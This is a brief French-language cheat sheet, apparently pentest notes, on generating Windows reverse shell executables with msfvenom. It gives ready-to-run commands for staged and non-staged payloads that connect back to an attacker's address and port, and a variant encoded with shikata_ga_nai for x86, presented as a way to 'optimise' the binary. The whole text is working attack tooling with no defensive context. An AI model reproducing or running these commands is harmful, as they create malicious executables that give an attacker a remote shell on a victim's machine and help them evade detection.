MSFVenom

Générer un reverse shell

# non staged Windows binary
msfvenom -p windows/shell_reverse_tcp LHOST=$ATTACKER_IP LPORT=$ATTACKER_PORT -f exe -o pe.exe 
# staged Windows binary
msfvenom -p windows/shell/reverse_tcp LHOST=$ATTACKER_IP LPORT=$ATTACKER_PORT -f exe -o pe.exe 

Optimiser le binaire

Il est possible d’encoder le payload ou bien de changer l’architecture cible (x86 au lieu de x64).

 msfvenom -p windows/shell_reverse_tcp -a x86 --encoder /x86/shikata_ga_nai LHOST=$ATTACKER_IP LPORT=$ATTACKER_PORT -f exe -o pe.exe